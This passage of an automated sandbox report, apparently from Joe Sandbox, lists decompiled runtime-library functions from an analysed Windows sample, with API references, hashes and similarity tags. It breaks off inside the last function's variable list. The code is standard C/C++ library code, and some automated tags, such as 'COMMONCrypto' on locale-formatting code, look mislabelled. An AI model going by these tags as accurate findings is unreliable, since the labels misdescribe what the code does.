0x004230ef
0x004230ef
0x004230ef
0x004230ef
0x004230ef
0x004230f5
0x004230f7
0x004230f7
0x004283a7
0x004283ac
0x004283b2
0x004283b8
0x004283be
0x004283c4
0x004283ca
0x004283d1
0x004283d8
0x004283df
0x004283e6
0x004283ed
0x004283f4
0x004283f5
0x004283fe
0x00428406
0x0042840e
0x00428419
0x00428423
0x00428428
0x0042842d
0x00428437
0x00428441
0x00428446
0x0042844c
0x00428451
0x0042845d
0x00428462
0x00428464
0x0042846c
0x00428477
0x00428484
0x00428486
0x00428488
0x0042848d
0x004284a1

APIs

IsDebuggerPresent.KERNEL32 ref: 00428457
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042846C
UnhandledExceptionFilter.KERNEL32(P8F), ref: 00428477
GetCurrentProcess.KERNEL32(C0000409), ref: 00428493
TerminateProcess.KERNEL32(00000000), ref: 0042849A

Strings

P8F, xrefs: 00428472
L=J., xrefs: 0042844C

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: L=J.$P8F
API String ID: 2579439406-2598199797
Opcode ID: ebd2f991c8e59183eb168960ff5c699fd49c6f081b817dd23e0c6853c81e0d51
Instruction ID: 3805f9ef859044804316e58828ed3c3cfe3b34f1c2b46313c7d2970626198f0e
Opcode Fuzzy Hash: ebd2f991c8e59183eb168960ff5c699fd49c6f081b817dd23e0c6853c81e0d51
Instruction Fuzzy Hash: B921CFB49023849FD700EF68E8456547BE0BB49317F40406AE90897372F7F49A898F4E

Uniqueness

Uniqueness Score: -1.00%

Function 0042EFE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042EFE7(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E00427B90(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E00427B90(__esi, ?str?) != 0) {
						_v8 = E00435662(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}

0x0042efe7
0x0042efef
0x0042f057
0x0042f061
0x00000000
0x0042f063
0x0042f06a
0x0042f06a
0x00000000
0x00000000
0x00000000
0x0042f007
0x0042f016
0x0042f03c
0x00000000
0x0042f018
0x0042f02e
0x0042f059
0x0042f05c
0x0042f030
0x0042f030
0x0042f034
0x0042f034
0x0042f02e
0x0042f016

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0042F624,?,00425CD6,?,000000BC,?,00000001,00000000,00000000), ref: 0042F026
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0042F624,?,00425CD6,?,000000BC,?,00000001,00000000,00000000), ref: 0042F04F
GetACP.KERNEL32(?,?,0042F624,?,00425CD6,?,000000BC,?,00000001,00000000), ref: 0042F063

Strings

ACP, xrefs: 0042EFF6
OCP, xrefs: 0042F007

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 0bcbc9c90fc7068e43bbfa4f620f48f9ca237137826a76eaae3abe62cbcecb95
Instruction ID: c314e731e6011df1bb04121bc25c9566fee3bb542ac92d1e03004e383cd34c72
Opcode Fuzzy Hash: 0bcbc9c90fc7068e43bbfa4f620f48f9ca237137826a76eaae3abe62cbcecb95
Instruction Fuzzy Hash: 2601F530705326BAEB219B50BC06F5B77B85B0075DFE00077F005E1193DB68EE89865D

Uniqueness

Uniqueness Score: -1.00%

Function 0044C0A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0044C0A2(void* __ecx, void* __eflags) {
				char _v6;
				short _v8;
				void* __edi;
				void* __ebp;
				signed int _t17;
				void* _t19;
				void* _t20;
				void* _t25;

				_v8 = 0;
				asm("stosw");
				GetLocaleInfoW( *(E004254CE(_t20,  &_v6, _t25, __eflags) + 0x14), 0x22,  &_v8, 2);
				if(_v8 != 0x30) {
					__eflags = _v8 - 0x31;
					if(_v8 != 0x31) {
						__eflags = _v8 - 0x32;
						_t17 = (0 | _v8 != 0x00000032) - 0x00000001 & 0x00000003;
						__eflags = _t17;
						return _t17;
					} else {
						__eflags = 1;
						return 1;
					}
				} else {
					_t19 = 2;
					return _t19;
				}
			}

0x0044c0ab
0x0044c0b2
0x0044c0c4
0x0044c0d0
0x0044c0d9
0x0044c0de
0x0044c0e3
0x0044c0ec
0x0044c0ec
0x0044c0f0
0x0044c0e0
0x0044c0e0
0x0044c0e2
0x0044c0e2
0x0044c0d2
0x0044c0d4
0x0044c0d6
0x0044c0d6

APIs

____lc_handle_func.LIBCMT ref: 0044C0BC

Part of subcall function 004254CE: __getptd.LIBCMT ref: 004254CE

GetLocaleInfoW.KERNEL32(?,00000022,00448ED9,00000002,?,?,?,00448ED9), ref: 0044C0C4

Strings

2, xrefs: 0044C0E3

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: InfoLocale____lc_handle_func__getptd
String ID: 2
API String ID: 4216669283-450215437
Opcode ID: 1d07df6d22528b45c6577b8bd59964313408f1175bb2870a0a32ff22ff50b0e2
Instruction ID: c1961147c498851a26461b799c8cafaebca98af16ff729616f14bc0afe48c67f
Opcode Fuzzy Hash: 1d07df6d22528b45c6577b8bd59964313408f1175bb2870a0a32ff22ff50b0e2
Instruction Fuzzy Hash: 60F0A026A41208F9DB12DB90D90BA9F73B9EB80798F208495E102E70D1E7F4DFC4D295

Uniqueness

Uniqueness Score: -1.00%

Function 00447649 Relevance: 3.4, APIs: 2, Instructions: 448
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00447649(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t202;
				signed short _t204;
				signed int _t208;
				signed int _t210;
				char* _t211;
				intOrPtr _t213;
				void* _t217;
				void* _t224;
				intOrPtr _t225;
				signed int _t228;
				void* _t230;
				intOrPtr _t236;
				intOrPtr _t244;
				intOrPtr* _t247;
				intOrPtr* _t250;
				void* _t252;
				intOrPtr _t253;
				void* _t254;
				void* _t255;
				intOrPtr _t256;
				void* _t257;
				intOrPtr _t258;
				intOrPtr* _t260;
				intOrPtr _t266;
				intOrPtr* _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t284;
				void* _t285;
				void* _t286;
				signed int _t287;
				void* _t293;
				char* _t299;
				signed short _t301;
				signed int _t302;
				signed int _t303;
				char* _t305;
				char _t314;
				void* _t315;
				signed int _t316;
				void* _t320;
				void* _t328;
				intOrPtr _t329;
				intOrPtr _t351;
				signed int _t361;
				signed int _t362;
				intOrPtr* _t364;
				intOrPtr _t365;
				signed int _t366;
				intOrPtr* _t368;
				void* _t370;
				signed int _t374;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				intOrPtr _t399;

				_t361 = __edx;
				_push(0xe0);
				E00425719(E0044FE41, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t383 - 0xa4)) =  *((intOrPtr*)(_t383 + 8));
				_t370 = __ecx;
				 *((intOrPtr*)(_t383 - 0x90)) =  *((intOrPtr*)(_t383 + 0x18));
				 *(_t383 - 0x94) =  *(_t383 + 0x1c) & 0x0000ffff;
				 *((intOrPtr*)(_t383 - 4)) = 0;
				_t388 =  *((intOrPtr*)(_t383 + 0x14));
				if( *((intOrPtr*)(_t383 + 0x14)) == 0) {
					_push(E004013A0(_t383 - 0xac));
					 *((char*)(_t383 - 4)) = 2;
					_t202 = E0043EC4C(0, __edx, __edi, __ecx, __eflags);
					_t364 = _t202;
					 *((intOrPtr*)(_t383 - 0x88)) = _t202;
					_t320 = _t383 - 0xac;
				} else {
					_push(E004013A0(_t383 - 0xa8));
					 *((char*)(_t383 - 4)) = 1;
					_t364 = E0043ECE9(0, __edx, __edi, __ecx, _t388);
					 *((intOrPtr*)(_t383 - 0x88)) = _t364;
					_t320 = _t383 - 0xa8;
				}
				 *((char*)(_t383 - 4)) = 0;
				E004012D0();
				_t204 = E0043B943(_t320, 0x30, 0, _t370 + 8);
				_t372 = _t204 & 0x0000ffff;
				_t385 = _t384 + 0xc;
				 *(_t383 - 0x98) = _t204 & 0x0000ffff;
				E0043E9B7(_t364, _t383 - 0x48);
				 *((char*)(_t383 - 4)) = 3;
				_t208 =  *((intOrPtr*)( *_t364 + 0x1c))();
				asm("cdq");
				_t210 = (_t208 ^ _t361) - _t361;
				 *(_t383 - 0x8c) = _t210;
				if( *((intOrPtr*)(_t383 + 0x34)) > _t210) {
					__eflags =  *((intOrPtr*)(_t383 - 0x34)) - 0x10;
					_t211 =  *((intOrPtr*)(_t383 - 0x48));
					if( *((intOrPtr*)(_t383 - 0x34)) < 0x10) {
						_t211 = _t383 - 0x48;
					}
					__eflags =  *_t211 - 0x7f;
					if( *_t211 != 0x7f) {
						__eflags =  *((intOrPtr*)(_t383 - 0x34)) - 0x10;
						_t299 =  *((intOrPtr*)(_t383 - 0x48));
						if( *((intOrPtr*)(_t383 - 0x34)) < 0x10) {
							_t299 = _t383 - 0x48;
						}
						__eflags =  *_t299;
						if( *_t299 > 0) {
							_t301 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88)))) + 8))();
							__eflags =  *((intOrPtr*)(_t383 - 0x34)) - 0x10;
							_t368 =  *((intOrPtr*)(_t383 - 0x48));
							_t316 = _t301 & 0x0000ffff;
							if( *((intOrPtr*)(_t383 - 0x34)) < 0x10) {
								_t368 = _t383 - 0x48;
							}
							_t382 =  *((intOrPtr*)(_t383 + 0x34)) -  *(_t383 - 0x8c);
							while(1) {
								_t302 =  *_t368;
								__eflags = _t302 - 0x7f;
								if(_t302 == 0x7f) {
									goto L19;
								}
								__eflags = _t302;
								if(_t302 <= 0) {
									goto L19;
								}
								_t303 = _t302;
								__eflags = _t303 - _t382;
								if(_t303 >= _t382) {
									goto L19;
								}
								_t382 = _t382 - _t303;
								E0044091C(_t383 + 0x24, _t361, _t382, 1, _t316);
								_t305 = _t368 + 1;
								__eflags =  *_t305;
								if( *_t305 > 0) {
									_t368 = _t305;
								}
							}
						}
					}
					goto L19;
				} else {
					E0044091C(_t383 + 0x24, _t361, 0, _t210 -  *((intOrPtr*)(_t383 + 0x34)) + 1, _t372);
					L19:
					 *(_t383 - 0x1c) =  *(_t383 - 0x1c) & 0x00000000;
					_t365 = 7;
					 *((intOrPtr*)(_t383 - 0x18)) = _t365;
					 *((short*)(_t383 - 0x2c)) = 0;
					_t373 =  *((intOrPtr*)(_t383 - 0x88));
					_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88))));
					_push(_t383 - 0x84);
					 *((char*)(_t383 - 4)) = 4;
					if( *((char*)(_t383 + 0x20)) == 0) {
						 *((intOrPtr*)(_t213 + 0x20))();
						_t217 = E00449632(_t373, _t383 - 0x80);
						 *((char*)(_t383 - 4)) = 6;
					} else {
						 *((intOrPtr*)(_t213 + 0x24))();
						_t217 = E0044964B(_t373, _t383 - 0x80);
						 *((char*)(_t383 - 4)) = 5;
					}
					E00446338(_t383 - 0x2c, _t217);
					E0043C7F3(_t383 - 0x80, 1, 0);
					 *(_t383 - 0x54) =  *(_t383 - 0x54) & 0x00000000;
					 *((intOrPtr*)(_t383 - 0x50)) = _t365;
					 *((short*)(_t383 - 0x64)) = 0;
					 *((char*)(_t383 - 4)) = 7;
					if(( *( *((intOrPtr*)(_t383 - 0x90)) + 0x14) & 0x00000008) != 0) {
						_t293 = E00449619( *((intOrPtr*)(_t383 - 0x88)), _t383 - 0x80);
						 *((char*)(_t383 - 4)) = 8;
						E00446338(_t383 - 0x64, _t293);
						 *((char*)(_t383 - 4)) = 7;
						E0043C7F3(_t383 - 0x80, 1, 0);
					}
					_t366 =  *(_t383 - 0x8c);
					_t314 = 0;
					_t362 = 0;
					_t328 = 0;
					do {
						_t224 =  *((char*)(_t383 + _t328 - 0x84)) - 0x20;
						if(_t224 == 0) {
							_t362 = _t362 + 1;
							__eflags = _t362;
							L38:
							__eflags = _t328 - 3;
							if(_t328 != 3) {
								_t314 = 1;
							}
							goto L40;
						}
						_t284 = _t224 - 4;
						if(_t284 == 0) {
							_t362 = _t362 +  *(_t383 - 0x54);
							goto L40;
						}
						_t285 = _t284 - 7;
						if(_t285 == 0) {
							_t362 = _t362 +  *(_t383 - 0x1c);
							goto L40;
						}
						_t286 = _t285 - 0x4b;
						if(_t286 == 0) {
							__eflags =  *((intOrPtr*)(_t383 + 0x34)) - _t366;
							if( *((intOrPtr*)(_t383 + 0x34)) > _t366) {
								_t287 = 0;
								__eflags = 0;
							} else {
								_t287 = _t366 -  *((intOrPtr*)(_t383 + 0x34)) + 1;
							}
							__eflags = 0 - _t366;
							asm("sbb esi, esi");
							_t362 = _t362 +  ~0x00000000 +  *((intOrPtr*)(_t383 + 0x34)) + _t287;
							goto L40;
						}
						if(_t286 == 0) {
							goto L38;
						}
						L40:
						_t328 = _t328 + 1;
					} while (_t328 < 4);
					_t329 =  *((intOrPtr*)(_t383 - 0x90));
					_t399 =  *((intOrPtr*)(_t329 + 0x24));
					_t225 =  *((intOrPtr*)(_t329 + 0x20));
					if(_t399 < 0 || _t399 <= 0 && _t225 == 0 || _t225 <= _t362) {
						_t374 = 0;
						__eflags = 0;
					} else {
						_t374 = _t225 - _t362;
					}
					_t228 =  *(_t329 + 0x14) & 0x000001c0;
					 *(_t383 - 0x8c) = _t228;
					if(_t228 != 0x40 && (_t228 != 0x100 || _t314 == 0)) {
						_t281 = E0043C5FA(_t383 - 0xa0,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x94), _t374);
						 *((intOrPtr*)(_t383 + 0xc)) =  *_t281;
						_t385 = _t385 + 0x14;
						 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t281 + 4));
						_t374 = 0;
					}
					_t315 = 0;
					do {
						_t230 =  *((char*)(_t383 + _t315 - 0x84)) - 0x20;
						if(_t230 == 0) {
							 *((intOrPtr*)(_t383 - 0xa0)) =  *((intOrPtr*)(_t383 + 0xc));
							 *((intOrPtr*)(_t383 - 0x9c)) =  *((intOrPtr*)(_t383 + 0x10));
							E0043C582(_t383 - 0xa0,  *(_t383 - 0x94));
							 *((intOrPtr*)(_t383 + 0xc)) =  *((intOrPtr*)(_t383 - 0xa0));
							 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t383 - 0x9c));
							L81:
							__eflags =  *(_t383 - 0x8c) - 0x100;
							if( *(_t383 - 0x8c) != 0x100) {
								goto L84;
							}
							_t250 = E0043C5FA(_t383 - 0xb4,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x94), _t374);
							_t385 = _t385 + 0x14;
							_t374 = 0;
							__eflags = 0;
							L83:
							 *((intOrPtr*)(_t383 + 0xc)) =  *_t250;
							 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t250 + 4));
							goto L84;
						}
						_t252 = _t230 - 4;
						if(_t252 == 0) {
							__eflags =  *((intOrPtr*)(_t383 - 0x50)) - 8;
							_t253 =  *((intOrPtr*)(_t383 - 0x64));
							if( *((intOrPtr*)(_t383 - 0x50)) < 8) {
								_t253 = _t383 - 0x64;
							}
							_push( *(_t383 - 0x54));
							_push(_t253);
							_t254 = _t383 - 0xe4;
							L62:
							_push( *((intOrPtr*)(_t383 + 0x10)));
							_push( *((intOrPtr*)(_t383 + 0xc)));
							L63:
							_push(_t254);
							_t250 = E0043C77F();
							_t385 = _t385 + 0x14;
							goto L83;
						}
						_t255 = _t252 - 7;
						if(_t255 == 0) {
							__eflags =  *(_t383 - 0x1c);
							if( *(_t383 - 0x1c) <= 0) {
								goto L84;
							}
							__eflags =  *((intOrPtr*)(_t383 - 0x18)) - 8;
							_t256 =  *((intOrPtr*)(_t383 - 0x2c));
							if( *((intOrPtr*)(_t383 - 0x18)) < 8) {
								_t256 = _t383 - 0x2c;
							}
							_push(1);
							_push(_t256);
							_t254 = _t383 - 0xec;
							goto L62;
						}
						_t257 = _t255 - 0x4b;
						if(_t257 == 0) {
							__eflags = _t366;
							if(_t366 != 0) {
								__eflags =  *((intOrPtr*)(_t383 + 0x34)) - _t366;
								if( *((intOrPtr*)(_t383 + 0x34)) > _t366) {
									__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
									_t258 =  *((intOrPtr*)(_t383 + 0x24));
									if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
										_t258 = _t383 + 0x24;
									}
									_t260 = E0043C77F(_t383 - 0xcc,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)), _t258,  *((intOrPtr*)(_t383 + 0x34)) - _t366);
									 *((intOrPtr*)(_t383 + 0xc)) =  *_t260;
									 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t260 + 4));
									_t385 = _t385 + 0x14;
									E0043C582(_t383 + 0xc,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88)))) + 4))() & 0x0000ffff);
									__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
									_t266 =  *((intOrPtr*)(_t383 + 0x24));
									if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
										_t266 = _t383 + 0x24;
									}
									_push(_t366);
									_push(_t266 + ( *((intOrPtr*)(_t383 + 0x34)) - _t366) * 2);
									_t254 = _t383 - 0xdc;
									goto L62;
								}
								E0043C582(_t383 + 0xc,  *(_t383 - 0x98));
								E0043C582(_t383 + 0xc,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t383 - 0x88)))) + 4))() & 0x0000ffff);
								_t276 = E0043C5FA(_t383 - 0xd4,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x98), _t366 -  *((intOrPtr*)(_t383 + 0x34)));
								 *((intOrPtr*)(_t383 + 0xc)) =  *_t276;
								_t385 = _t385 + 0x14;
								__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
								 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t276 + 4));
								_t351 =  *((intOrPtr*)(_t383 + 0x24));
								if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
									_t351 = _t383 + 0x24;
								}
								_push( *((intOrPtr*)(_t383 + 0x34)));
								_push(_t351);
								_push( *((intOrPtr*)(_t276 + 4)));
								_push( *_t276);
								_t254 = _t383 - 0xc4;
								goto L63;
							}
							__eflags =  *((intOrPtr*)(_t383 + 0x38)) - 8;
							_t277 =  *((intOrPtr*)(_t383 + 0x24));
							if( *((intOrPtr*)(_t383 + 0x38)) < 8) {
								_t277 = _t383 + 0x24;
							}
							_push( *((intOrPtr*)(_t383 + 0x34)));
							_push(_t277);
							_t254 = _t383 - 0xbc;
							goto L62;
						}
						if(_t257 == 0) {
							goto L81;
						}
						L84:
						_t315 = _t315 + 1;
					} while (_t315 < 4);
					if( *(_t383 - 0x1c) > 1) {
						_t244 =  *((intOrPtr*)(_t383 - 0x2c));
						if( *((intOrPtr*)(_t383 - 0x18)) < 8) {
							_t244 = _t383 - 0x2c;
						}
						_t247 = E0043C77F(_t383 - 0xb4,  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)), _t244 + 2,  *(_t383 - 0x1c) - 1);
						 *((intOrPtr*)(_t383 + 0xc)) =  *_t247;
						_t385 = _t385 + 0x14;
						 *((intOrPtr*)(_t383 + 0x10)) =  *((intOrPtr*)(_t247 + 4));
					}
					_t236 =  *((intOrPtr*)(_t383 - 0x90));
					 *((intOrPtr*)(_t236 + 0x20)) = 0;
					 *((intOrPtr*)(_t236 + 0x24)) = 0;
					E0043C5FA( *((intOrPtr*)(_t383 - 0xa4)),  *((intOrPtr*)(_t383 + 0xc)),  *((intOrPtr*)(_t383 + 0x10)),  *(_t383 - 0x94), _t374);
					E0043C7F3(_t383 - 0x64, 1, 0);
					E0043C7F3(_t383 - 0x2c, 1, 0);
					E00402E20(_t383 - 0x48, 1, 0);
					E0043C7F3(_t383 + 0x24, 1, 0);
					return E00425763(_t315, 0, 1);
				}
			}

0x00447649
0x00447649
0x00447653
0x0044765b
0x00447665
0x0044766a
0x00447670
0x00447678
0x0044767b
0x0044767e
0x004476b3
0x004476b4
0x004476b8
0x004476be
0x004476c0
0x004476c6
0x00447680
0x0044768c
0x0044768d
0x00447696
0x00447699
0x0044769f
0x0044769f
0x004476cc
0x004476d0
0x004476dc
0x004476e1
0x004476e4
0x004476ed
0x004476f3
0x004476fc
0x00447700
0x00447703
0x00447706
0x00447708
0x00447711
0x00447724
0x00447728
0x0044772b
0x0044772d
0x0044772d
0x00447730
0x00447733
0x00447735
0x00447739
0x0044773c
0x0044773e
0x0044773e
0x00447741
0x00447744
0x0044774e
0x00447751
0x00447755
0x00447758
0x0044775b
0x0044775d
0x0044775d
0x00447763
0x0044778e
0x0044778e
0x00447790
0x00447792
0x00000000
0x00000000
0x0044776b
0x0044776d
0x00000000
0x00000000
0x0044776f
0x00447772
0x00447774
0x00000000
0x00000000
0x00447777
0x0044777f
0x00447784
0x00447787
0x0044778a
0x0044778c
0x0044778c
0x0044778a
0x0044778e
0x00447744
0x00000000
0x00447713
0x0044771d
0x00447794
0x00447794
0x0044779a
0x0044779d
0x004477a0
0x004477a8
0x004477ae
0x004477b6
0x004477b7
0x004477bd
0x004477df
0x004477f4
0x004477f9
0x004477bf
0x004477bf
0x004477d4
0x004477d9
0x004477d9
0x00447801
0x0044780d
0x00447812
0x00447818
0x0044781b
0x00447828
0x0044782e
0x0044783a
0x00447843
0x00447847
0x00447853
0x00447857
0x00447857
0x0044785c
0x00447862
0x00447864
0x00447866
0x00447868
0x00447870
0x00447873
0x004478b4
0x004478b4
0x004478b5
0x004478b5
0x004478b8
0x004478ba
0x004478ba
0x00000000
0x004478b8
0x00447875
0x00447878
0x004478af
0x00000000
0x004478af
0x0044787a
0x0044787d
0x004478aa
0x00000000
0x004478aa
0x0044787f
0x00447882
0x0044788a
0x0044788d
0x00447897
0x00447897
0x0044788f
0x00447894
0x00447894
0x0044789b
0x0044789d
0x004478a6
0x00000000
0x004478a6
0x00447886
0x00000000
0x00000000
0x004478bc
0x004478bc
0x004478bd
0x004478c2
0x004478c8
0x004478cc
0x004478cf
0x004478e1
0x004478e1
0x004478db
0x004478dd
0x004478dd
0x004478e8
0x004478ed
0x004478f6
0x00447917
0x0044791e
0x00447924
0x00447927
0x0044792a
0x0044792a
0x0044792c
0x0044792e
0x00447936
0x00447939
0x00447aba
0x00447ac9
0x00447acf
0x00447ada
0x00447ae3
0x00447ae6
0x00447ae6
0x00447af0
0x00000000
0x00000000
0x00447b06
0x00447b0b
0x00447b0e
0x00447b0e
0x00447b10
0x00447b12
0x00447b18
0x00000000
0x00447b18
0x0044793f
0x00447942
0x00447a96
0x00447a9a
0x00447a9d
0x00447a9f
0x00447a9f
0x00447aa2
0x00447aa5
0x00447aa6
0x0044797d
0x0044797d
0x00447980
0x00447983
0x00447983
0x00447984
0x00447989
0x00000000
0x00447989
0x00447948
0x0044794b
0x00447a72
0x00447a76
0x00000000
0x00000000
0x00447a7c
0x00447a80
0x00447a83
0x00447a85
0x00447a85
0x00447a88
0x00447a8a
0x00447a8b
0x00000000
0x00447a8b
0x00447951
0x00447954
0x00447963
0x00447965
0x00447991
0x00447994
0x00447a07
0x00447a0b
0x00447a0e
0x00447a10
0x00447a10
0x00447a27
0x00447a2e
0x00447a3a
0x00447a3f
0x00447a4c
0x00447a51
0x00447a55
0x00447a58
0x00447a5a
0x00447a5a
0x00447a65
0x00447a66
0x00447a67
0x00000000
0x00447a67
0x0044799f
0x004479b6
0x004479d4
0x004479db
0x004479e1
0x004479e4
0x004479e8
0x004479eb
0x004479ee
0x004479f0
0x004479f0
0x004479f3
0x004479f6
0x004479f7
0x004479fa
0x004479fc
0x00000000
0x004479fc
0x00447967
0x0044796b
0x0044796e
0x00447970
0x00447970
0x00447973
0x00447976
0x00447977
0x00000000
0x00447977
0x00447958
0x00000000
0x00000000
0x00447b1b
0x00447b1b
0x00447b1c
0x00447b29
0x00447b2f
0x00447b32
0x00447b34
0x00447b34
0x00447b4d
0x00447b54
0x00447b5a
0x00447b5d
0x00447b5d
0x00447b60
0x00447b72
0x00447b78
0x00447b81
0x00447b91
0x00447b9b
0x00447ba5
0x00447baf
0x00447bbf
0x00447bbf

APIs

__EH_prolog3_GS.LIBCMT ref: 00447653
_Maklocchr.LIBCPMT ref: 004476DC

Part of subcall function 004013A0: std::_Lockit::_Lockit.LIBCPMT ref: 004013BC

Part of subcall function 0043ECE9: __EH_prolog3.LIBCMT ref: 0043ECF0
Part of subcall function 0043ECE9: std::_Lockit::_Lockit.LIBCPMT ref: 0043ECFA

Part of subcall function 0044091C: std::_Xinvalid_argument.LIBCPMT ref: 00440935
Part of subcall function 0044091C: std::_Xinvalid_argument.LIBCPMT ref: 0044094B
Part of subcall function 0044091C: _memmove.LIBCMT ref: 00440993

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::_$LockitLockit::_Xinvalid_argument$H_prolog3H_prolog3_Maklocchr_memmove
String ID:
API String ID: 2257133000-0
Opcode ID: 601059f8100c17f3e9b2cafb6b52aaa4bf8307d7b30fe0e166670844c6a02ef0
Instruction ID: 9795883c5eebec3693503857df0a0b99e219bb8ba70a523132da70e6598661e7
Opcode Fuzzy Hash: 601059f8100c17f3e9b2cafb6b52aaa4bf8307d7b30fe0e166670844c6a02ef0
Instruction Fuzzy Hash: 1D025A719042589FEF14DF68C984BEE7BB5EF09304F44809AF809A7251DB38AE46CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00445DBF Relevance: 3.4, APIs: 2, Instructions: 448
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00445DBF(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t202;
				signed short _t204;
				signed int _t208;
				signed int _t210;
				char* _t211;
				intOrPtr _t213;
				void* _t217;
				void* _t224;
				intOrPtr _t225;
				signed int _t228;
				void* _t230;
				intOrPtr _t236;
				intOrPtr _t244;
				intOrPtr* _t247;
				intOrPtr* _t250;
				void* _t252;
				intOrPtr _t253;
				void* _t254;
				void* _t255;
				intOrPtr _t256;
				void* _t257;
				intOrPtr _t258;
				intOrPtr* _t260;
				intOrPtr _t266;
				intOrPtr* _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t284;
				void* _t285;
				void* _t286;
				signed int _t287;
				void* _t293;
				char* _t299;
				signed short _t301;
				signed int _t302;
				signed int _t303;
				char* _t305;
				char _t314;
				void* _t315;
				signed int _t316;
				void* _t320;
				void* _t328;
				intOrPtr _t329;
				intOrPtr _t351;
				signed int _t361;
				signed int _t362;
				intOrPtr* _t364;
				intOrPtr _t365;
				signed int _t366;
				intOrPtr* _t368;
				void* _t370;
				signed int _t374;
				signed int _t382;
